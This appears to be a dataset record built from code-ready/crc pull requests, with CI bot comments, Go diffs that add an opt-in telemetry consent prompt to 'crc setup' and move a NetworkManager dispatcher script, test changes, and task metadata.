non-interactive flow. but this sounds almost like the `skip-all` for the preflights as this has other side-effects when used. 
openshift-ci[bot]: @guillaumerose: The following test **failed**, say `/retest` to rerun all failed tests: Test name | Commit | Details | Rerun command --- | --- | --- | --- ci/prow/images | 2369ddd35baba5269efc5851c016e029a7ae7385 | [link](https://prow.ci.openshift.org/view/gs/origin-ci-test/pr-logs/pull/code-ready_crc/1818/pull-ci-code-ready-crc-master-images/1346731803766951936) | `/test images` [Full PR test history](https://prow.ci.openshift.org/pr-history?org=code-ready&repo=crc&pr=1818). [Your PR dashboard](https://prow.ci.openshift.org/pr?query=is:pr+state:open+author:guillaumerose). <details> Instructions for interacting with me using PR comments are available [here](https://git.k8s.io/community/contributors/guide/pull-requests.md). If you have questions or suggestions related to my behavior, please file an issue against the [kubernetes/test-infra](https://github.com/kubernetes/test-infra/issues/new?title=Prow%20issue:) repository. I understand the commands that are listed [here](https://go.k8s.io/bot-commands). </details> <!-- test report --> openshift-ci[bot]: @guillaumerose: The following tests **failed**, say `/retest` to rerun all failed tests: Test name | Commit | Details | Rerun command --- | --- | --- | --- ci/prow/images | 2369ddd35baba5269efc5851c016e029a7ae7385 | [link](https://prow.ci.openshift.org/view/gs/origin-ci-test/pr-logs/pull/code-ready_crc/1818/pull-ci-code-ready-crc-master-images/1346731803766951936) | `/test images` ci/prow/e2e-crc | 2369ddd35baba5269efc5851c016e029a7ae7385 | [link](https://prow.ci.openshift.org/view/gs/origin-ci-test/pr-logs/pull/code-ready_crc/1818/pull-ci-code-ready-crc-master-e2e-crc/1346731803733397504) | `/test e2e-crc` [Full PR test history](https://prow.ci.openshift.org/pr-history?org=code-ready&repo=crc&pr=1818). [Your PR dashboard](https://prow.ci.openshift.org/pr?query=is:pr+state:open+author:guillaumerose). 
<details> Instructions for interacting with me using PR comments are available [here](https://git.k8s.io/community/contributors/guide/pull-requests.md). If you have questions or suggestions related to my behavior, please file an issue against the [kubernetes/test-infra](https://github.com/kubernetes/test-infra/issues/new?title=Prow%20issue:) repository. I understand the commands that are listed [here](https://go.k8s.io/bot-commands). </details> <!-- test report -->
code-ready__crc-1818
diff --git a/cmd/crc-embedder/cmd/extract.go b/cmd/crc-embedder/cmd/extract.go index e99ce853f..f0cab79ed 100644 --- a/cmd/crc-embedder/cmd/extract.go +++ b/cmd/crc-embedder/cmd/extract.go @@ -1,10 +1,10 @@ package cmd import ( + "fmt" + "github.com/code-ready/crc/pkg/crc/logging" - "github.com/code-ready/crc/pkg/crc/output" "github.com/code-ready/crc/pkg/embed" - "github.com/spf13/cobra" ) @@ -32,5 +32,5 @@ func runExtract(args []string) { if err != nil { logging.Fatalf("Could not extract data embedded in %s: %v", executablePath, err) } - output.Outf("Successfully copied embedded '%s' from %s to %s: %v", embedName, executablePath, destFile, err) + fmt.Printf("Successfully copied embedded '%s' from %s to %s: %v", embedName, executablePath, destFile, err) } diff --git a/cmd/crc-embedder/cmd/list.go b/cmd/crc-embedder/cmd/list.go index 3fe8d6d1a..9ab0c52bb 100644 --- a/cmd/crc-embedder/cmd/list.go +++ b/cmd/crc-embedder/cmd/list.go @@ -1,10 +1,10 @@ package cmd import ( - "github.com/code-ready/crc/pkg/crc/logging" - "github.com/code-ready/crc/pkg/crc/output" + "fmt" "github.com/YourFin/binappend" + "github.com/code-ready/crc/pkg/crc/logging" "github.com/spf13/cobra" ) @@ -30,8 +30,8 @@ func runList(args []string) { if err != nil { logging.Fatalf("Could not access data embedded in %s: %v", executablePath, err) } - output.Outf("Data files embedded in %s:\n", executablePath) + fmt.Printf("Data files embedded in %s:\n", executablePath) for _, name := range extractor.AvalibleData() { - output.Outln("\t", name) + fmt.Println("\t", name) } } diff --git a/cmd/crc-embedder/cmd/root.go b/cmd/crc-embedder/cmd/root.go index a062cd816..eb00a0634 100644 --- a/cmd/crc-embedder/cmd/root.go +++ b/cmd/crc-embedder/cmd/root.go @@ -1,10 +1,10 @@ package cmd import ( + "fmt" + "github.com/code-ready/crc/pkg/crc/constants" "github.com/code-ready/crc/pkg/crc/logging" - "github.com/code-ready/crc/pkg/crc/output" - "github.com/spf13/cobra" ) @@ -41,8 +41,8 @@ func runPrerun() { } func 
runRoot() { - output.Outln("No command given") - output.Outln("") + fmt.Println("No command given") + fmt.Println("") } func runPostrun() { diff --git a/cmd/crc/cmd/config/config.go b/cmd/crc/cmd/config/config.go index 4aa2e4cdb..d3ba19a85 100644 --- a/cmd/crc/cmd/config/config.go +++ b/cmd/crc/cmd/config/config.go @@ -48,7 +48,7 @@ func RegisterSettings(cfg *config.Config) { cfg.AddSetting(EnableClusterMonitoring, false, config.ValidateBool, config.SuccessfullyApplied) // Telemeter Configuration - cfg.AddSetting(ConsentTelemetry, false, config.ValidateBool, config.SuccessfullyApplied) + cfg.AddSetting(ConsentTelemetry, "", config.ValidateYesNo, config.SuccessfullyApplied) } func isPreflightKey(key string) bool { diff --git a/cmd/crc/cmd/config/get.go b/cmd/crc/cmd/config/get.go index 2a6cb92f7..9f694eb79 100644 --- a/cmd/crc/cmd/config/get.go +++ b/cmd/crc/cmd/config/get.go @@ -5,7 +5,6 @@ import ( "fmt" "github.com/code-ready/crc/pkg/crc/config" - "github.com/code-ready/crc/pkg/crc/output" "github.com/spf13/cobra" ) @@ -26,7 +25,7 @@ func configGetCmd(config config.Storage) *cobra.Command { case v.IsDefault: return fmt.Errorf("Configuration property '%s' is not set. 
Default value is '%s'", key, v.AsString()) default: - output.Outln(key, ":", v.AsString()) + fmt.Println(key, ":", v.AsString()) } return nil }, diff --git a/cmd/crc/cmd/config/set.go b/cmd/crc/cmd/config/set.go index f6b356b20..0afc89d54 100644 --- a/cmd/crc/cmd/config/set.go +++ b/cmd/crc/cmd/config/set.go @@ -2,9 +2,9 @@ package config import ( "errors" + "fmt" "github.com/code-ready/crc/pkg/crc/config" - "github.com/code-ready/crc/pkg/crc/output" "github.com/spf13/cobra" ) @@ -23,7 +23,7 @@ func configSetCmd(config config.Storage) *cobra.Command { } if setMessage != "" { - output.Outln(setMessage) + fmt.Println(setMessage) } return nil }, diff --git a/cmd/crc/cmd/config/unset.go b/cmd/crc/cmd/config/unset.go index cfbe6484b..222c20595 100644 --- a/cmd/crc/cmd/config/unset.go +++ b/cmd/crc/cmd/config/unset.go @@ -2,9 +2,9 @@ package config import ( "errors" + "fmt" "github.com/code-ready/crc/pkg/crc/config" - "github.com/code-ready/crc/pkg/crc/output" "github.com/spf13/cobra" ) @@ -22,7 +22,7 @@ func configUnsetCmd(config config.Storage) *cobra.Command { return err } if unsetMessage != "" { - output.Outln(unsetMessage) + fmt.Println(unsetMessage) } return nil }, diff --git a/cmd/crc/cmd/ip.go b/cmd/crc/cmd/ip.go index 576178ac0..477040f60 100644 --- a/cmd/crc/cmd/ip.go +++ b/cmd/crc/cmd/ip.go @@ -1,7 +1,8 @@ package cmd import ( - "github.com/code-ready/crc/pkg/crc/output" + "fmt" + "github.com/spf13/cobra" ) @@ -28,6 +29,6 @@ func runIP(arguments []string) error { if err != nil { return err } - output.Outln(ip) + fmt.Println(ip) return nil } diff --git a/cmd/crc/cmd/oc_env.go b/cmd/crc/cmd/oc_env.go index 09495bf92..b9ae212df 100644 --- a/cmd/crc/cmd/oc_env.go +++ b/cmd/crc/cmd/oc_env.go @@ -4,7 +4,6 @@ import ( "fmt" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/output" "github.com/code-ready/crc/pkg/os/shell" "github.com/spf13/cobra" ) @@ -34,13 +33,13 @@ func runOcEnv(args []string) error { return err } proxyConfig := 
consoleResult.ClusterConfig.ProxyConfig - output.Outln(shell.GetPathEnvString(userShell, constants.CrcOcBinDir)) + fmt.Println(shell.GetPathEnvString(userShell, constants.CrcOcBinDir)) if proxyConfig.IsEnabled() { - output.Outln(shell.GetEnvString(userShell, "HTTP_PROXY", proxyConfig.HTTPProxy)) - output.Outln(shell.GetEnvString(userShell, "HTTPS_PROXY", proxyConfig.HTTPSProxy)) - output.Outln(shell.GetEnvString(userShell, "NO_PROXY", proxyConfig.GetNoProxyString())) + fmt.Println(shell.GetEnvString(userShell, "HTTP_PROXY", proxyConfig.HTTPProxy)) + fmt.Println(shell.GetEnvString(userShell, "HTTPS_PROXY", proxyConfig.HTTPSProxy)) + fmt.Println(shell.GetEnvString(userShell, "NO_PROXY", proxyConfig.GetNoProxyString())) } - output.Outln(shell.GenerateUsageHint(userShell, "crc oc-env")) + fmt.Println(shell.GenerateUsageHint(userShell, "crc oc-env")) return nil } diff --git a/cmd/crc/cmd/podman_env.go b/cmd/crc/cmd/podman_env.go index ad37ea0f4..2a2014b07 100644 --- a/cmd/crc/cmd/podman_env.go +++ b/cmd/crc/cmd/podman_env.go @@ -5,7 +5,6 @@ import ( "fmt" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/output" "github.com/code-ready/crc/pkg/os/shell" "github.com/spf13/cobra" ) @@ -36,12 +35,12 @@ func RunPodmanEnv(args []string) error { return err } - output.Outln(shell.GetPathEnvString(userShell, constants.CrcBinDir)) - output.Outln(shell.GetEnvString(userShell, "PODMAN_USER", constants.DefaultSSHUser)) - output.Outln(shell.GetEnvString(userShell, "PODMAN_HOST", ip)) - output.Outln(shell.GetEnvString(userShell, "PODMAN_IDENTITY_FILE", constants.GetPrivateKeyPath())) - output.Outln(shell.GetEnvString(userShell, "PODMAN_IGNORE_HOSTS", "1")) - output.Outln(shell.GenerateUsageHint(userShell, "crc podman-env")) + fmt.Println(shell.GetPathEnvString(userShell, constants.CrcBinDir)) + fmt.Println(shell.GetEnvString(userShell, "PODMAN_USER", constants.DefaultSSHUser)) + fmt.Println(shell.GetEnvString(userShell, "PODMAN_HOST", ip)) + 
fmt.Println(shell.GetEnvString(userShell, "PODMAN_IDENTITY_FILE", constants.GetPrivateKeyPath())) + fmt.Println(shell.GetEnvString(userShell, "PODMAN_IGNORE_HOSTS", "1")) + fmt.Println(shell.GenerateUsageHint(userShell, "crc podman-env")) return nil } diff --git a/cmd/crc/cmd/root.go b/cmd/crc/cmd/root.go index 1c2b96adf..4c360a139 100644 --- a/cmd/crc/cmd/root.go +++ b/cmd/crc/cmd/root.go @@ -13,7 +13,6 @@ import ( "github.com/code-ready/crc/pkg/crc/logging" "github.com/code-ready/crc/pkg/crc/machine" "github.com/code-ready/crc/pkg/crc/network" - "github.com/code-ready/crc/pkg/crc/output" "github.com/code-ready/crc/pkg/crc/preflight" "github.com/code-ready/crc/pkg/crc/segment" "github.com/spf13/cobra" @@ -80,7 +79,7 @@ func runPostrun() { } func runRoot() { - output.Outln("No command given") + fmt.Println("No command given") } func Execute() { diff --git a/cmd/crc/cmd/setup.go b/cmd/crc/cmd/setup.go index d8b5ace93..e0e3946d1 100644 --- a/cmd/crc/cmd/setup.go +++ b/cmd/crc/cmd/setup.go @@ -8,6 +8,7 @@ import ( cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" "github.com/code-ready/crc/pkg/crc/constants" + "github.com/code-ready/crc/pkg/crc/input" "github.com/code-ready/crc/pkg/crc/preflight" "github.com/spf13/cobra" ) @@ -31,6 +32,20 @@ var setupCmd = &cobra.Command{ } func runSetup(arguments []string) error { + if config.Get(cmdConfig.ConsentTelemetry).AsString() == "" { + fmt.Println("CodeReady Containers is constantly improving and we would like to know more about usage!") + if input.PromptUserForYesOrNo("Would you like to contribute anonymous usage statistics (more details at https://developers.redhat.com/article/tool-data-collection)", false) { + if _, err := config.Set(cmdConfig.ConsentTelemetry, "yes"); err != nil { + return err + } + fmt.Printf("Thanks for helping us! 
You can disable telemetry with the command 'crc config set %s no'.\n", cmdConfig.ConsentTelemetry) + } else { + if _, err := config.Set(cmdConfig.ConsentTelemetry, "no"); err != nil { + return err + } + fmt.Printf("No worry, you can still enable telemetry manually with the command 'crc config set %s yes'.\n", cmdConfig.ConsentTelemetry) + } + } err := preflight.SetupHost(config) return render(&setupResult{ Success: err == nil, diff --git a/pkg/crc/config/config.go b/pkg/crc/config/config.go index 7cd3cf121..0fe0f538d 100644 --- a/pkg/crc/config/config.go +++ b/pkg/crc/config/config.go @@ -9,7 +9,7 @@ import ( const ( configPropDoesntExistMsg = "Configuration property '%s' does not exist" - invalidProp = "Value '%s' for configuration property '%s' is invalid, reason: %s" + invalidProp = "Value '%v' for configuration property '%s' is invalid, reason: %s" ) type Config struct { diff --git a/pkg/crc/config/validations.go b/pkg/crc/config/validations.go index 634c21fe1..5ce5bd6bb 100644 --- a/pkg/crc/config/validations.go +++ b/pkg/crc/config/validations.go @@ -95,3 +95,10 @@ func ValidateNoProxy(value interface{}) (bool, string) { } return true, "" } + +func ValidateYesNo(value interface{}) (bool, string) { + if cast.ToString(value) == "yes" || cast.ToString(value) == "no" { + return true, "" + } + return false, "must be yes or no" +} diff --git a/pkg/crc/input/input.go b/pkg/crc/input/input.go index be5086102..7f77c8729 100644 --- a/pkg/crc/input/input.go +++ b/pkg/crc/input/input.go @@ -6,7 +6,6 @@ import ( "os" "strings" - "github.com/code-ready/crc/pkg/crc/output" terminal "golang.org/x/term" survey "gopkg.in/AlecAivazis/survey.v1" ) @@ -19,7 +18,7 @@ func PromptUserForYesOrNo(message string, force bool) bool { return false } var response string - output.Outf(message + "? [y/N]: ") + fmt.Printf(message + "? 
[y/N]: ") fmt.Scanf("%s", &response) return strings.ToLower(response) == "y" diff --git a/pkg/crc/machine/start.go b/pkg/crc/machine/start.go index ad4b6b641..545c51c18 100644 --- a/pkg/crc/machine/start.go +++ b/pkg/crc/machine/start.go @@ -23,7 +23,6 @@ import ( "github.com/code-ready/crc/pkg/crc/ssh" crcssh "github.com/code-ready/crc/pkg/crc/ssh" "github.com/code-ready/crc/pkg/crc/systemd" - "github.com/code-ready/crc/pkg/crc/systemd/states" crcos "github.com/code-ready/crc/pkg/os" "github.com/code-ready/machine/libmachine" "github.com/code-ready/machine/libmachine/drivers" @@ -350,12 +349,6 @@ func (client *client) Start(startConfig StartConfig) (*StartResult, error) { } } - // Check if kubelet service is running inside the VM - kubeletStatus, err := sd.Status("kubelet") - if err != nil || kubeletStatus != states.Running { - return nil, errors.Wrap(err, "kubelet service is not running") - } - // In Openshift 4.3, when cluster comes up, the following happens // 1. After the openshift-apiserver pod is started, its log contains multiple occurrences of `certificate has expired or is not yet valid` // 2. Initially there is no request-header's client-ca crt available to `extension-apiserver-authentication` configmap diff --git a/pkg/crc/output/output.go b/pkg/crc/output/output.go deleted file mode 100644 index 80b50f461..000000000 --- a/pkg/crc/output/output.go +++ /dev/null @@ -1,18 +0,0 @@ -package output - -import ( - "fmt" - "io" -) - -func Outln(args ...interface{}) { - fmt.Println(args...) -} - -func Outf(s string, args ...interface{}) { - fmt.Printf(s, args...) -} - -func Fout(w io.Writer, args ...interface{}) (n int, err error) { - return fmt.Fprintln(w, args...) 
-} diff --git a/pkg/crc/preflight/preflight_checks_tray_darwin.go b/pkg/crc/preflight/preflight_checks_tray_darwin.go index 05961eee0..ee31ee2fd 100644 --- a/pkg/crc/preflight/preflight_checks_tray_darwin.go +++ b/pkg/crc/preflight/preflight_checks_tray_darwin.go @@ -195,7 +195,9 @@ func downloadOrExtractTrayApp() error { }() logging.Debug("Trying to extract tray from crc executable") - err = embed.Extract(filepath.Base(constants.GetCRCMacTrayDownloadURL()), tmpArchivePath) + trayFileName := filepath.Base(constants.GetCRCMacTrayDownloadURL()) + trayDestFileName := filepath.Join(tmpArchivePath, trayFileName) + err = embed.Extract(trayFileName, trayDestFileName) if err != nil { logging.Debug("Could not extract tray from crc executable", err) logging.Debug("Downloading crc tray") @@ -204,15 +206,14 @@ func downloadOrExtractTrayApp() error { return err } } - archivePath := filepath.Join(tmpArchivePath, filepath.Base(constants.GetCRCMacTrayDownloadURL())) outputPath := constants.CrcBinDir err = goos.MkdirAll(outputPath, 0750) if err != nil { return errors.Wrap(err, "Cannot create the target directory.") } - _, err = extract.Uncompress(archivePath, outputPath, false) + _, err = extract.Uncompress(trayDestFileName, outputPath, false) if err != nil { - return errors.Wrapf(err, "Cannot uncompress '%s'", archivePath) + return errors.Wrapf(err, "Cannot uncompress '%s'", trayDestFileName) } return nil } diff --git a/pkg/crc/preflight/preflight_checks_tray_windows.go b/pkg/crc/preflight/preflight_checks_tray_windows.go index 501984608..d2493018d 100644 --- a/pkg/crc/preflight/preflight_checks_tray_windows.go +++ b/pkg/crc/preflight/preflight_checks_tray_windows.go @@ -161,7 +161,9 @@ func fixTrayExecutableExists() error { }() logging.Debug("Trying to extract tray from crc executable") - err = embed.Extract(filepath.Base(constants.GetCRCWindowsTrayDownloadURL()), tmpArchivePath) + trayFileName := filepath.Base(constants.GetCRCWindowsTrayDownloadURL()) + trayDestFileName := 
filepath.Join(tmpArchivePath, trayFileName) + err = embed.Extract(trayFileName, trayDestFileName) if err != nil { logging.Debug("Could not extract tray from crc executable", err) logging.Debug("Downloading crc tray") @@ -170,10 +172,9 @@ func fixTrayExecutableExists() error { return err } } - archivePath := filepath.Join(tmpArchivePath, filepath.Base(constants.GetCRCWindowsTrayDownloadURL())) - _, err = extract.Uncompress(archivePath, constants.TrayExecutableDir, false) + _, err = extract.Uncompress(trayDestFileName, constants.TrayExecutableDir, false) if err != nil { - return fmt.Errorf("Cannot uncompress '%s': %v", archivePath, err) + return fmt.Errorf("Cannot uncompress '%s': %v", trayDestFileName, err) } return nil diff --git a/pkg/crc/segment/segment.go b/pkg/crc/segment/segment.go index e9ac423c4..f81d6131c 100644 --- a/pkg/crc/segment/segment.go +++ b/pkg/crc/segment/segment.go @@ -56,7 +56,7 @@ func (c *Client) Close() error { } func (c *Client) Upload(action string, duration time.Duration, err error) error { - if !c.config.Get(config.ConsentTelemetry).AsBool() { + if c.config.Get(config.ConsentTelemetry).AsString() != "yes" { return nil }
Ask the user to turn on telemetry when running crc setup ``` $ crc setup CodeReady Containers is constantly improving and we would like to know more about usage! Would you like to contribute anonymous usage statistics (more details at https://developers.redhat.com/article/tool-data-collection)? [y/N]: y Thanks for helping us! You can disable telemetry with the command 'crc config set consent-telemetry no'. ... $ crc setup CodeReady Containers is constantly improving and we would like to know more about usage! Would you like to contribute anonymous usage statistics (more details at https://developers.redhat.com/article/tool-data-collection)? [y/N]: No worry, you can still enable telemetry manually with the command 'crc config set consent-telemetry yes'. ... ```
**Title** Enable telemetry consent prompting and clean up console output handling **Problem** The `crc setup` command never asked users for telemetry consent, and the telemetry configuration was stored as a boolean while the rest of the code treated it as a string. Additionally, the custom output helper was removed from many commands, leading to inconsistent messaging and compilation issues. **Root Cause** Telemetry setting type and validation were mismatched, and the code base still referenced the old output abstraction after its removal. **Fix / Expected Behavior** - Introduce a “yes/no” validated telemetry setting and default it to an unset state. - Prompt users during `crc setup` to opt‑in or opt‑out of telemetry, persisting the choice. - Adjust telemetry upload logic to respect the new string‑based consent value. - Replace the removed output helper with standard formatted printing across all CLI commands. - Correct embed extraction paths for tray components on macOS and Windows to avoid path errors. - Add a small input utility for consistent yes/no prompting. **Risk & Validation** - Verify that existing configurations migrate cleanly and that the new validation does not reject legacy values. - Run the full CLI test suite to ensure all commands produce expected console output without the old output package. - Manually test `crc setup` to confirm the telemetry prompt appears, records the choice, and that subsequent telemetry uploads respect the recorded consent.
1,818
code-ready/crc
diff --git a/pkg/crc/segment/segment_test.go b/pkg/crc/segment/segment_test.go index abc799f97..0eabde50c 100644 --- a/pkg/crc/segment/segment_test.go +++ b/pkg/crc/segment/segment_test.go @@ -60,7 +60,7 @@ func mockServer() (chan []byte, *httptest.Server) { return done, server } -func newTestConfig(value bool) (*crcConfig.Config, error) { +func newTestConfig(value string) (*crcConfig.Config, error) { storage := crcConfig.NewEmptyInMemoryStorage() config := crcConfig.New(storage) cmdConfig.RegisterSettings(config) @@ -80,7 +80,7 @@ func TestClientUploadWithConsent(t *testing.T) { require.NoError(t, err) defer os.RemoveAll(dir) - config, err := newTestConfig(true) + config, err := newTestConfig("yes") require.NoError(t, err) c, err := newCustomClient(config, filepath.Join(dir, "telemetry"), server.URL) @@ -113,7 +113,7 @@ func TestClientUploadWithOutConsent(t *testing.T) { require.NoError(t, err) defer os.RemoveAll(dir) - config, err := newTestConfig(false) + config, err := newTestConfig("no") require.NoError(t, err) c, err := newCustomClient(config, filepath.Join(dir, "telemetry"), server.URL)
[ "TestClientUploadWithConsent", "TestClientUploadWithOutConsent" ]
[ "TestApi", "TestSetconfigApi", "TestGetconfigApi", "TestGetClusterOperatorsStatus", "TestGetClusterOperatorsStatusProgressing", "TestGetClusterOperatorStatus", "TestGetClusterOperatorStatusNotFound", "TestSuccessfullyApplied", "TestViperConfigUnknown", "TestViperConfigSetAndGet", "TestViperConfigUnsetAndGet", "TestViperConfigSetReloadAndGet", "TestViperConfigLoadDefaultValue", "TestViperConfigBindFlagSet", "TestViperConfigCastSet", "TestCannotSetWithWrongType", "TestCannotGetWithWrongType", "TestRetryAfter", "TestRetryAfterFailure", "TestRetryAfterSlowFailure", "TestRetryAfterMaxAttempts", "TestRetryAfterSuccessAfterFailures", "TestMultiErrorString", "TestCertificateAuthority", "TestUnmarshalMarshal", "TestUse", "TestExtract", "TestVersionCheck", "TestValidateProxyURL", "TestRunCommand", "TestRunCommandWithoutContextAndCluster", "TestCountConfigurationOptions", "TestCountPreflights", "TestCheckPreflight", "TestSkipPreflight", "TestFixPreflight", "TestCheckAppArmor", "TestFixAppArmor", "TestCleanupAppArmor", "TestNewKeyPair", "TestRunner", "TestGenerateSSHKey", "TestSystemd", "TestSystemdStatuses", "TestUncompress", "TestUnCompressBundle", "TestReplaceEnv", "TestAddEnv", "TestFileContentFuncs", "TestParseOsRelease", "TestParseLine", "TestDetectBash", "TestDetectFish", "TestUnknownShell" ]
Function: newTestConfig(value string) Location: pkg/crc/segment/segment_test.go (test helper used by TestClientUploadWithConsent and TestClientUploadWithOutConsent) Inputs: <code>value</code> – a string expected to be either <code>"yes"</code> or <code>"no"</code>, which is stored as the telemetry consent value in the in‑memory configuration. Outputs: <code>(*crcConfig.Config, error)</code> – the created configuration object (with the <code>consent‑telemetry</code> setting set to the given string) and any error that occurred while building it. Description: Creates an in‑memory CRC configuration for tests, registers the command‑line settings, and pre‑populates the <code>ConsentTelemetry</code> key with the provided <code>"yes"</code>/<code>"no"</code> value so that the segment client can be exercised under both consent and non‑consent scenarios.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive && apt-get update -qq && apt-get install -y -qq golang", "export GOPATH=$HOME/go && export GOCACHE=$HOME/.cache/go-build && export XDG_CACHE_HOME=$HOME/.cache && export HOME=/tmp && mkdir -p $GOCACHE $HOME", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "make test" }
{ "num_modified_files": 19, "num_modified_lines": 67, "pr_author": "guillaumerose", "pr_labels": [ "approved", "lgtm" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.93, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://developers.redhat.com/article/tool-data-collection" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests prompting the user for telemetry consent during `crc setup` and handling the response, which is clearly described with expected messages. The provided tests align with this behavior by checking consent handling using string values, and the code changes (config validation, input prompt, segment upload check) directly support the requirement without unrelated test regressions. No signals of B‑category problems are present, so the task is classified as solvable (A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, 
"test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
667a4164481ca9271b424d51775f75baed69243e
2021-01-06 11:34:15
openshift-ci-robot: [APPROVALNOTIFIER] This PR is **APPROVED** This pull-request has been approved by: *<a href="https://github.com/code-ready/crc/pull/1819#" title="Author self-approved">cfergeau</a>* The full list of commands accepted by this bot can be found [here](https://go.k8s.io/bot-commands?repo=code-ready%2Fcrc). The pull request process is described [here](https://git.k8s.io/community/contributors/guide/owners.md#the-code-review-process) <details > Needs approval from an approver in each of these files: - ~~[OWNERS](https://github.com/code-ready/crc/blob/master/OWNERS)~~ [cfergeau] Approvers can indicate their approval by writing `/approve` in a comment Approvers can cancel approval by writing `/approve cancel` in a comment </details> <!-- META={"approvers":[]} -->
code-ready__crc-1819
diff --git a/cmd/crc/cmd/root.go b/cmd/crc/cmd/root.go index 36e7a13b2..1c2b96adf 100644 --- a/cmd/crc/cmd/root.go +++ b/cmd/crc/cmd/root.go @@ -5,6 +5,7 @@ import ( "io/ioutil" "os" "strings" + "time" cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" @@ -175,13 +176,12 @@ func addForceFlag(cmd *cobra.Command) { func executeWithLogging(fullCmd string, input func(cmd *cobra.Command, args []string) error) func(cmd *cobra.Command, args []string) error { return func(cmd *cobra.Command, args []string) error { logging.Debugf("Running '%s'", fullCmd) - if err := input(cmd, args); err != nil { - if serr := segmentClient.Upload(fullCmd, err); serr != nil { - logging.Debugf("Cannot send data to telemetry: %v", serr) - } - return err + startTime := time.Now() + err := input(cmd, args) + if serr := segmentClient.Upload(fullCmd, time.Since(startTime), err); serr != nil { + logging.Debugf("Cannot send data to telemetry: %v", serr) } - return nil + return err } } diff --git a/pkg/crc/preflight/preflight_checks_network_linux.go b/pkg/crc/preflight/preflight_checks_network_linux.go index bc78d6802..ca22b3ea9 100644 --- a/pkg/crc/preflight/preflight_checks_network_linux.go +++ b/pkg/crc/preflight/preflight_checks_network_linux.go @@ -72,22 +72,27 @@ server=/crc.testing/192.168.130.11 dns=dnsmasq ` - crcNetworkManagerDispatcherPath = filepath.Join(crcNetworkManagerRootPath, "dispatcher.d", "pre-up.d", "99-crc.sh") - crcNetworkManagerDispatcherConfig = `#!/bin/sh + crcNetworkManagerOldDispatcherPath = filepath.Join(crcNetworkManagerRootPath, "dispatcher.d", "pre-up.d", "99-crc.sh") + crcNetworkManagerDispatcherPath = filepath.Join(crcNetworkManagerRootPath, "dispatcher.d", "99-crc.sh") + crcNetworkManagerDispatcherConfig = `#!/bin/sh # This is a NetworkManager dispatcher script to configure split DNS for # the 'crc' libvirt network. 
-# The corresponding crc bridge is recreated each time the system reboots, so -# it cannot be configured permanently through NetworkManager. -# Changing DNS settings with nmcli requires the connection to go down/up, -# so we directly make the change using resolvectl +# +# The corresponding crc bridge is not created through NetworkManager, so +# it cannot be configured permanently through NetworkManager. We make the +# change directly using resolvectl instead. +# +# NetworkManager will overwrite this resolvectl configuration every time a +# network connection goes up/down, so we run this script on each of these events +# to restore our settings. This is a NetworkManager bug which is fixed in +# version 1.26.6 by this commit: +# https://cgit.freedesktop.org/NetworkManager/NetworkManager/commit/?id=ee4e679bc7479de42780ebd8e3a4d74afa2b2ebe export LC_ALL=C -if [ "$1" = crc ]; then - resolvectl domain "$1" ~testing - resolvectl dns "$1" 192.168.130.11 - resolvectl default-route "$1" false -fi +resolvectl domain crc ~testing +resolvectl dns crc 192.168.130.11 +resolvectl default-route crc false exit 0 ` @@ -266,6 +271,10 @@ func checkCrcNetworkManagerDispatcherFile() error { func fixCrcNetworkManagerDispatcherFile() error { logging.Debug("Fixing NetworkManager dispatcher configuration") + + // Remove dispatcher script which was used in crc 1.20 - it's been moved to a new location + _ = removeNetworkManagerConfigFile(crcNetworkManagerOldDispatcherPath) + err := fixNetworkManagerConfigFile(crcNetworkManagerDispatcherPath, crcNetworkManagerDispatcherConfig, 0755) if err != nil { return err @@ -276,6 +285,9 @@ func fixCrcNetworkManagerDispatcherFile() error { } func removeCrcNetworkManagerDispatcherFile() error { + // Remove dispatcher script which was used in crc 1.20 - it's been moved to a new location + _ = removeNetworkManagerConfigFile(crcNetworkManagerOldDispatcherPath) + return removeNetworkManagerConfigFile(crcNetworkManagerDispatcherPath) } diff --git 
a/pkg/crc/segment/segment.go b/pkg/crc/segment/segment.go index 254dfb386..e9ac423c4 100644 --- a/pkg/crc/segment/segment.go +++ b/pkg/crc/segment/segment.go @@ -4,7 +4,9 @@ import ( "io/ioutil" "os" "path/filepath" + "runtime" "strings" + "time" "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" @@ -53,24 +55,35 @@ func (c *Client) Close() error { return c.segmentClient.Close() } -func (c *Client) Upload(action string, err error) error { +func (c *Client) Upload(action string, duration time.Duration, err error) error { if !c.config.Get(config.ConsentTelemetry).AsBool() { return nil } - logging.Debug("Uploading the error to segment") anonymousID, uerr := getUserIdentity(c.telemetryFilePath) if uerr != nil { return uerr } - t := analytics.NewTraits(). - Set("action", action). - Set("error", err.Error()) + if err := c.segmentClient.Enqueue(analytics.Identify{ + AnonymousId: anonymousID, + Traits: analytics.NewTraits(). + Set("os", runtime.GOOS), + }); err != nil { + return err + } + + properties := analytics.NewProperties(). + Set("success", err == nil). + Set("duration", duration.Milliseconds()) + if 